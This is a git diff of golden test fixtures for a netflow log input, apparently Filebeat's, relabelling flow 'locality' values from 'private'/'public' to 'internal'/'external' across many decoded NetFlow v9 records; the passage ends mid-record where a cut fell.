@@ }, "flow": { "id": "lfYzCmoZgqo", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -561,7 +561,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61773 } }, @@ -574,7 +574,7 @@ "Fields": { "destination": { "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -590,7 +590,7 @@ }, "flow": { "id": "_9ahEyFsD94", - "locality": "private" + "locality": "internal" }, "netflow": { "asa_username": "", @@ -640,7 +640,7 @@ }, "source": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56649 } }, @@ -654,7 +654,7 @@ "destination": { "bytes": 14179, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -670,7 +670,7 @@ }, "flow": { "id": "_9ahEyFsD94", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -721,7 +721,7 @@ "source": { "bytes": 69, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56649 } }, @@ -735,7 +735,7 @@ "destination": { "bytes": 14179, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -751,7 +751,7 @@ }, "flow": { "id": "_9ahEyFsD94", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -802,7 +802,7 @@ "source": { "bytes": 69, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56649 } }, @@ -815,7 +815,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -831,7 +831,7 @@ }, "flow": { "id": "bnG6S7DUlEE", - "locality": "private" + "locality": "internal" }, "netflow": { "asa_username": "", @@ -881,7 +881,7 @@ }, "source": { "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61777 } }, @@ -895,7 +895,7 @@ "destination": { "bytes": 14178, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -911,7 +911,7 @@ }, "flow": { "id": "bnG6S7DUlEE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -962,7 +962,7 @@ "source": { "bytes": 69, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61777 } }, @@ -976,7 +976,7 @@ "destination": { "bytes": 14178, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -992,7 +992,7 @@ }, "flow": { "id": "bnG6S7DUlEE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1043,7 +1043,7 @@ "source": { "bytes": 69, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61777 } }, @@ -1056,7 +1056,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1072,7 +1072,7 @@ }, "flow": { "id": "wuMbsS0oTj4", - "locality": "private" + "locality": "internal" }, "netflow": { "asa_username": "", @@ -1122,7 +1122,7 @@ }, "source": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56650 } }, @@ -1136,7 +1136,7 @@ "destination": { "bytes": 881, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1152,7 +1152,7 @@ }, "flow": { "id": "wuMbsS0oTj4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1203,7 +1203,7 @@ "source": { "bytes": 75, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56650 } }, @@ -1217,7 +1217,7 @@ "destination": { "bytes": 881, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1233,7 +1233,7 @@ }, "flow": { "id": "wuMbsS0oTj4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1284,7 +1284,7 @@ "source": { "bytes": 75, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56650 } }, @@ -1297,7 +1297,7 @@ "Fields": { "destination": { "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1313,7 +1313,7 @@ }, "flow": { "id": "geQD5O-NWw8", - "locality": "private" + "locality": "internal" }, "netflow": { "asa_username": "", @@ -1363,7 +1363,7 @@ }, "source": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56651 } }, @@ -1377,7 +1377,7 @@ "destination": { "bytes": 14178, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1393,7 +1393,7 @@ }, "flow": { "id": "geQD5O-NWw8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -1444,7 +1444,7 @@ "source": { "bytes": 69, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56651 } }, @@ -1458,7 +1458,7 @@ "destination": { "bytes": 14178, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1474,7 +1474,7 @@ }, "flow": { "id": "geQD5O-NWw8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -1525,7 +1525,7 @@ "source": { "bytes": 69, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56651 } }, diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA.golden.json index c586d597e751..135aa56d0d4e 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 17549 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "5JpExP8VeSU", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -76,7 +76,7 @@ "source": { "bytes": 56, "ip": "192.168.14.1", - "locality": "private", + "locality": "internal", "port": 0 } }, @@ -89,7 +89,7 @@ "Fields": { "destination": { "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -105,7 +105,7 @@ }, "flow": { "id": "MSQgezzAYh0", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -158,7 +158,7 @@ "source": { "bytes": 56, "ip": "192.168.23.22", - "locality": "private", + "locality": "internal", "port": 17549 } }, @@ -171,7 +171,7 @@ "Fields": { "destination": { "ip": "192.168.23.22", - "locality": "private", + "locality": "internal", "port": 17549 }, "event": { @@ -187,7 +187,7 @@ }, "flow": { "id": "MSQgezzAYh0", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -240,7 +240,7 @@ "source": { "bytes": 56, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -253,7 +253,7 @@ "Fields": { "destination": { "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -269,7 +269,7 @@ }, "flow": { "id": "ioGVEAJtaEQ", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -322,7 +322,7 @@ "source": { "bytes": 56, "ip": "192.168.23.20", - "locality": "private", + "locality": "internal", "port": 17805 } }, @@ -335,7 +335,7 @@ "Fields": { "destination": { "ip": "192.168.23.20", - "locality": "private", + "locality": "internal", "port": 17805 }, "event": { @@ -351,7 +351,7 @@ }, "flow": { "id": "ioGVEAJtaEQ", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -404,7 +404,7 @@ "source": { "bytes": 56, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -417,7 +417,7 @@ "Fields": { "destination": { "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -433,7 +433,7 @@ }, "flow": { "id": "0xqELVtMeog", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -486,7 +486,7 @@ "source": { "bytes": 56, "ip": "192.168.14.11", - "locality": "private", + "locality": "internal", "port": 17805 } }, @@ -499,7 +499,7 @@ "Fields": { "destination": { "ip": "192.168.14.11", - "locality": "private", + "locality": "internal", "port": 17805 }, "event": { @@ -515,7 +515,7 @@ }, "flow": { "id": "0xqELVtMeog", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -568,7 +568,7 @@ "source": { "bytes": 56, "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -581,7 +581,7 @@ "Fields": { "destination": { "ip": "192.168.14.1", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -597,7 +597,7 @@ }, "flow": { "id": "LA3WpK17LAw", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -650,7 +650,7 @@ "source": { "bytes": 56, "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 17805 } }, @@ -663,7 +663,7 @@ "Fields": { "destination": { "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 17805 }, "event": { @@ -679,7 +679,7 @@ }, "flow": { "id": "LA3WpK17LAw", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -732,7 +732,7 @@ "source": { "bytes": 56, "ip": "192.168.14.1", - "locality": "private", + "locality": "internal", "port": 0 } }, @@ -745,7 +745,7 @@ "Fields": { "destination": { "ip": "192.168.23.1", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -761,7 +761,7 @@ }, "flow": { "id": "tBFZO1WrQyk", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -814,7 +814,7 @@ "source": { "bytes": 160, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -827,7 +827,7 @@ "Fields": { "destination": { "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -843,7 +843,7 @@ }, "flow": { "id": "oil2JqFPSyE", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -896,7 +896,7 @@ "source": { "bytes": 56, "ip": "192.168.23.22", - "locality": "private", + "locality": "internal", "port": 18061 } }, @@ -909,7 +909,7 @@ "Fields": { "destination": { "ip": "192.168.23.22", - "locality": "private", + "locality": "internal", "port": 18061 }, "event": { @@ -925,7 +925,7 @@ }, "flow": { "id": "oil2JqFPSyE", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -978,7 +978,7 @@ "source": { "bytes": 56, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -991,7 +991,7 @@ "Fields": { "destination": { "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -1007,7 +1007,7 @@ }, "flow": { "id": "Pbk_o-xetL4", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -1060,7 +1060,7 @@ "source": { "bytes": 56, "ip": "192.168.23.20", - "locality": "private", + "locality": "internal", "port": 18061 } }, @@ -1073,7 +1073,7 @@ "Fields": { "destination": { "ip": "192.168.23.20", - "locality": "private", + "locality": "internal", "port": 18061 }, "event": { @@ -1089,7 +1089,7 @@ }, "flow": { "id": "Pbk_o-xetL4", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -1142,7 +1142,7 @@ "source": { "bytes": 56, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR-9000-series-template-260.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR-9000-series-template-260.golden.json index 961f90791b37..9922cc10d661 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR-9000-series-template-260.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR-9000-series-template-260.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.0.31.81", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "kkhtKjgAywQ", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -80,7 +80,7 @@ "source": { "bytes": 40, "ip": "10.0.9.146", - "locality": "private", + "locality": "internal", "packets": 1, "port": 54017 } @@ -94,7 +94,7 @@ "Fields": { "destination": { "ip": "10.0.35.4", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -113,7 +113,7 @@ }, "flow": { "id": "4su7p2nlyno", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -167,7 +167,7 @@ "source": { "bytes": 104, "ip": "10.0.17.42", - "locality": "private", + "locality": "internal", "packets": 2, "port": 36484 } @@ -181,7 +181,7 @@ "Fields": { "destination": { "ip": "10.0.34.141", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -200,7 +200,7 @@ }, "flow": { "id": "mfb1_zWayo4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -254,7 +254,7 @@ "source": { "bytes": 52, "ip": "10.0.22.111", - "locality": "private", + "locality": "internal", "packets": 1, "port": 16814 } @@ -268,7 +268,7 @@ "Fields": { "destination": { "ip": "10.0.36.170", - "locality": "private", + "locality": "internal", "port": 64812 }, "event": { @@ -287,7 +287,7 @@ }, "flow": { "id": "jKhffDbQq0o", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64497, @@ -341,7 +341,7 @@ "source": { "bytes": 435, "ip": "10.0.23.59", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -355,7 +355,7 @@ "Fields": { "destination": { "ip": "10.0.20.242", - "locality": "private", + "locality": "internal", "port": 2013 }, "event": { @@ -374,7 +374,7 @@ }, "flow": { "id": "5siGD7iCzo4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65442, @@ -428,7 +428,7 @@ "source": { "bytes": 969, "ip": "10.0.34.71", - "locality": "private", + "locality": "internal", "packets": 1, "port": 443 } @@ -442,7 +442,7 @@ "Fields": { "destination": { "ip": "10.0.30.102", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -461,7 +461,7 @@ }, "flow": { "id": "IyuegsSri_U", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -515,7 +515,7 @@ "source": { "bytes": 104, "ip": "10.0.10.133", - "locality": "private", + "locality": "internal", "packets": 2, "port": 35273 } @@ -529,7 +529,7 @@ "Fields": { "destination": { "ip": "10.0.6.24", - "locality": "private", + "locality": "internal", "port": 56771 }, "event": { @@ -548,7 +548,7 @@ }, "flow": { "id": "9JGzjsOdNi4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65431, @@ -602,7 +602,7 @@ "source": { "bytes": 52, "ip": "10.0.37.29", - "locality": "private", + "locality": "internal", "packets": 1, "port": 80 } @@ -616,7 +616,7 @@ "Fields": { "destination": { "ip": "10.0.11.113", - "locality": "private", + "locality": "internal", "port": 56830 }, "event": { @@ -635,7 +635,7 @@ }, "flow": { "id": "Y3aiAEAjjys", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65432, @@ -689,7 +689,7 @@ "source": { "bytes": 614, "ip": "10.0.32.176", - "locality": "private", + "locality": "internal", "packets": 1, "port": 443 } @@ -703,7 +703,7 @@ "Fields": { "destination": { "ip": "10.0.15.38", - "locality": "private", + "locality": "internal", "port": 40078 }, "event": { @@ -722,7 +722,7 @@ }, "flow": { "id": "sC3kzwxISec", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64498, @@ -776,7 +776,7 @@ "source": { "bytes": 4350, "ip": "10.0.12.21", - "locality": "private", + "locality": "internal", "packets": 3, "port": 443 } @@ -790,7 +790,7 @@ "Fields": { "destination": { "ip": "10.0.3.110", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -809,7 +809,7 @@ }, "flow": { "id": "dTmlxL48EoA", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 70, @@ -863,7 +863,7 @@ "source": { "bytes": 533, "ip": "10.0.4.212", - "locality": "private", + "locality": "internal", "packets": 2, "port": 50691 } @@ -877,7 +877,7 @@ "Fields": { "destination": { "ip": "10.0.1.136", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -896,7 +896,7 @@ }, "flow": { "id": "oMLDxCSgNuA", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -950,7 +950,7 @@ "source": { "bytes": 13660, "ip": "10.0.33.122", - "locality": "private", + "locality": "internal", "packets": 325, "port": 58814 } @@ -964,7 +964,7 @@ "Fields": { "destination": { "ip": "10.0.34.71", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -983,7 +983,7 @@ }, "flow": { "id": "5siGD7iCzo4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -1037,7 +1037,7 @@ "source": { "bytes": 89, "ip": "10.0.20.242", - "locality": "private", + "locality": "internal", "packets": 1, "port": 2013 } @@ -1051,7 +1051,7 @@ "Fields": { "destination": { "ip": "10.0.15.38", - "locality": "private", + "locality": "internal", "port": 51621 }, "event": { @@ -1070,7 +1070,7 @@ }, "flow": { "id": "-IcTJfcRi8w", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64498, @@ -1124,7 +1124,7 @@ "source": { "bytes": 833, "ip": "10.0.13.25", - "locality": "private", + "locality": "internal", "packets": 1, "port": 443 } @@ -1138,7 +1138,7 @@ "Fields": { "destination": { "ip": "10.0.2.18", - "locality": "private", + "locality": "internal", "port": 62464 }, "event": { @@ -1157,7 +1157,7 @@ }, "flow": { "id": "tyf0jfEIDwM", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65437, @@ -1211,7 +1211,7 @@ "source": { "bytes": 1625, "ip": "10.0.25.59", - "locality": "private", + "locality": "internal", "packets": 2, "port": 443 } @@ -1225,7 +1225,7 @@ "Fields": { "destination": { "ip": "10.0.27.168", - "locality": "private", + "locality": "internal", "port": 465 }, "event": { @@ -1244,7 +1244,7 @@ }, "flow": { "id": "OYKOBQNKdF4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -1298,7 +1298,7 @@ "source": { "bytes": 142184, "ip": "10.0.7.73", - "locality": "private", + "locality": "internal", "packets": 97, "port": 60312 } @@ -1312,7 +1312,7 @@ "Fields": { "destination": { "ip": "10.0.27.169", - "locality": "private", + "locality": "internal", "port": 995 }, "event": { @@ -1331,7 +1331,7 @@ }, "flow": { "id": "fC6tFjsdK54", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -1385,7 +1385,7 @@ "source": { "bytes": 3016, "ip": "10.0.19.50", - "locality": "private", + "locality": "internal", "packets": 58, "port": 34452 } @@ -1399,7 +1399,7 @@ "Fields": { "destination": { "ip": "10.0.24.13", - "locality": "private", + "locality": "internal", "port": 49917 }, "event": { @@ -1418,7 +1418,7 @@ }, "flow": { "id": "Kk4bVU4hDRk", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1472,7 +1472,7 @@ "source": { "bytes": 31500, "ip": "10.0.28.150", - "locality": "private", + "locality": "internal", "packets": 21, "port": 443 } @@ -1486,7 +1486,7 @@ "Fields": { "destination": { "ip": "10.0.21.200", - "locality": "private", + "locality": "internal", "port": 50254 }, "event": { @@ -1505,7 +1505,7 @@ }, "flow": { "id": "_Fk2ywvptGE", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1559,7 +1559,7 @@ "source": { "bytes": 2919, "ip": "10.0.26.188", - "locality": "private", + "locality": "internal", "packets": 3, "port": 993 } @@ -1573,7 +1573,7 @@ "Fields": { "destination": { "ip": "10.0.15.38", - "locality": "private", + "locality": "internal", "port": 35983 }, "event": { @@ -1592,7 +1592,7 @@ }, "flow": { "id": "MrTF7IZhOrg", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64498, @@ -1646,7 +1646,7 @@ "source": { "bytes": 4514, "ip": "10.0.29.34", - "locality": "private", + "locality": "internal", "packets": 5, "port": 443 } @@ -1660,7 +1660,7 @@ "Fields": { "destination": { "ip": "10.0.5.224", - "locality": "private", + "locality": "internal", "port": 51671 }, "event": { @@ -1679,7 +1679,7 @@ }, "flow": { "id": "hUKUTbBVmIY", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65431, @@ -1733,7 +1733,7 @@ "source": { "bytes": 326, "ip": "10.0.8.200", - "locality": "private", + "locality": "internal", "packets": 1, "port": 23128 } @@ -1747,7 +1747,7 @@ "Fields": { "destination": { "ip": "10.0.15.38", - "locality": "private", + "locality": "internal", "port": 52364 }, "event": { @@ -1766,7 +1766,7 @@ }, "flow": { "id": "IoEUbnBqGXE", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64498, @@ -1820,7 +1820,7 @@ "source": { "bytes": 112, "ip": "10.0.29.46", - "locality": "private", + "locality": "internal", "packets": 2, "port": 443 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR1001--X.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR1001--X.golden.json index 7a3989121e3b..9049d5513041 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR1001--X.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR1001--X.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.12.100.13", - "locality": "private", + "locality": "internal", "port": 53218 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "_qSyv-Xe8IM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAFHg==", @@ -70,7 +70,7 @@ "source": { "bytes": 965, "ip": "10.111.111.242", - "locality": "private", + "locality": "internal", "packets": 7, "port": 52444 } @@ -84,7 +84,7 @@ "Fields": { "destination": { "ip": "10.100.105.85", - "locality": "private", + "locality": "internal", "port": 41746 }, "event": { @@ -100,7 +100,7 @@ }, "flow": { "id": "7s_4xBb69Y0", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -147,7 +147,7 @@ "source": { "bytes": 284, "ip": "10.10.4.29", - "locality": "private", + "locality": "internal", "packets": 1, "port": 161 } @@ -161,7 +161,7 @@ "Fields": { "destination": { "ip": "10.111.111.242", - "locality": "private", + "locality": "internal", "port": 52444 }, "event": { @@ -177,7 +177,7 @@ }, "flow": { "id": "_qSyv-Xe8IM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAFHg==", @@ -224,7 +224,7 @@ "source": { "bytes": 670, "ip": "10.12.100.13", - "locality": "private", + "locality": "internal", "packets": 6, "port": 53218 } @@ -238,7 +238,7 @@ "Fields": { "destination": { "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "port": 61440 }, "event": { @@ -254,7 +254,7 @@ }, "flow": { "id": "jk1T8-P2OHM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -301,7 +301,7 @@ "source": { "bytes": 80, "ip": "10.12.104.239", - "locality": "private", + "locality": "internal", "packets": 2, "port": 1720 } @@ -315,7 +315,7 @@ "Fields": { "destination": { "ip": "10.12.104.239", - "locality": "private", + "locality": "internal", "port": 1720 }, "event": { @@ -331,7 +331,7 @@ }, "flow": { "id": "jk1T8-P2OHM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -378,7 +378,7 @@ "source": { "bytes": 80, "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61440 } @@ -392,7 +392,7 @@ "Fields": { "destination": { "ip": "10.15.131.98", - "locality": "private", + "locality": "internal", "port": 64400 }, "event": { @@ -408,7 +408,7 @@ }, "flow": { "id": "6AEj_wlzQm4", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAANQ==", @@ -455,7 +455,7 @@ "source": { "bytes": 101, "ip": "10.100.101.45", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -469,7 +469,7 @@ "Fields": { "destination": { "ip": "10.12.105.23", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -485,7 +485,7 @@ }, "flow": { "id": "MtCuD-nvBTY", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAHFA==", @@ -532,7 +532,7 @@ "source": { "bytes": 1134, "ip": "10.100.101.43", - "locality": "private", + "locality": "internal", "packets": 14, "port": 0 } @@ -546,7 +546,7 @@ "Fields": { "destination": { "ip": "10.11.31.108", - "locality": "private", + "locality": "internal", "port": 51708 }, "event": { @@ -562,7 +562,7 @@ }, "flow": { "id": "8zAXung0YbA", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "DQACBg==", @@ -609,7 +609,7 @@ "source": { "bytes": 237, "ip": "31.13.71.7", - "locality": "public", + "locality": "external", "packets": 4, "port": 443 } @@ -623,7 +623,7 @@ "Fields": { "destination": { "ip": "10.100.105.86", - "locality": "private", + "locality": "internal", "port": 58842 }, "event": { @@ -639,7 +639,7 @@ }, "flow": { "id": "5LxKkXX5FfM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -686,7 +686,7 @@ "source": { "bytes": 91, "ip": "10.11.21.60", - "locality": "private", + "locality": "internal", "packets": 1, "port": 161 } @@ -700,7 +700,7 @@ "Fields": { "destination": { "ip": "172.217.11.5", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -716,7 +716,7 @@ }, "flow": { "id": "MnDMft-qZjs", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "DQABzg==", @@ -763,7 +763,7 @@ "source": { "bytes": 41, "ip": "10.12.92.102", - "locality": "private", + "locality": "internal", "packets": 1, "port": 50766 } @@ -777,7 +777,7 @@ "Fields": { "destination": { "ip": "10.11.21.60", - "locality": "private", + "locality": "internal", "port": 161 }, "event": { @@ -793,7 +793,7 @@ }, "flow": { "id": "Ddy-Ii-ZDDI", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -840,7 +840,7 @@ "source": { "bytes": 111, "ip": "10.100.105.86", - "locality": "private", + "locality": "internal", "packets": 1, "port": 58843 } @@ -854,7 +854,7 @@ "Fields": { "destination": { "ip": "10.100.105.85", - "locality": "private", + "locality": "internal", "port": 41351 }, "event": { @@ -870,7 +870,7 @@ }, "flow": { "id": "Hiy-Ti0eVlY", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -917,7 +917,7 @@ "source": { "bytes": 1164, "ip": "10.10.4.234", - "locality": "private", + "locality": "internal", "packets": 4, "port": 161 } @@ -931,7 +931,7 @@ "Fields": { "destination": { "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "port": 61440 }, "event": { @@ -947,7 +947,7 @@ }, "flow": { "id": "7iMintjCsaw", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -994,7 +994,7 @@ "source": { "bytes": 80, "ip": "10.12.106.83", - "locality": "private", + "locality": "internal", "packets": 2, "port": 1720 } @@ -1008,7 +1008,7 @@ "Fields": { "destination": { "ip": "10.12.92.102", - "locality": "private", + "locality": "internal", "port": 50766 }, "event": { @@ -1024,7 +1024,7 @@ }, "flow": { "id": "MnDMft-qZjs", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "DQABzg==", @@ -1071,7 +1071,7 @@ "source": { "bytes": 52, "ip": "172.217.11.5", - "locality": "public", + "locality": "external", "packets": 1, "port": 443 } @@ -1085,7 +1085,7 @@ "Fields": { "destination": { "ip": "10.12.106.83", - "locality": "private", + "locality": "internal", "port": 1720 }, "event": { @@ -1101,7 +1101,7 @@ }, "flow": { "id": "7iMintjCsaw", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -1148,7 +1148,7 @@ "source": { "bytes": 80, "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61440 } @@ -1162,7 +1162,7 @@ "Fields": { "destination": { "ip": "74.201.129.29", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1178,7 +1178,7 @@ }, "flow": { "id": "hphBugBrKPY", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "DQABxQ==", @@ -1225,7 +1225,7 @@ "source": { "bytes": 3088, "ip": "10.12.81.86", - "locality": "private", + "locality": "internal", "packets": 10, "port": 58657 } @@ -1239,7 +1239,7 @@ "Fields": { "destination": { "ip": "10.12.100.13", - "locality": "private", + "locality": "internal", "port": 389 }, "event": { @@ -1255,7 +1255,7 @@ }, "flow": { "id": "gJ7Z20zGGk8", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB2Q==", @@ -1302,7 +1302,7 @@ "source": { "bytes": 5306, "ip": "10.14.121.98", - "locality": "private", + "locality": "internal", "packets": 24, "port": 50174 } @@ -1316,7 +1316,7 @@ "Fields": { "destination": { "ip": "10.100.105.86", - "locality": "private", + "locality": "internal", "port": 58843 }, "event": { @@ -1332,7 +1332,7 @@ }, "flow": { "id": 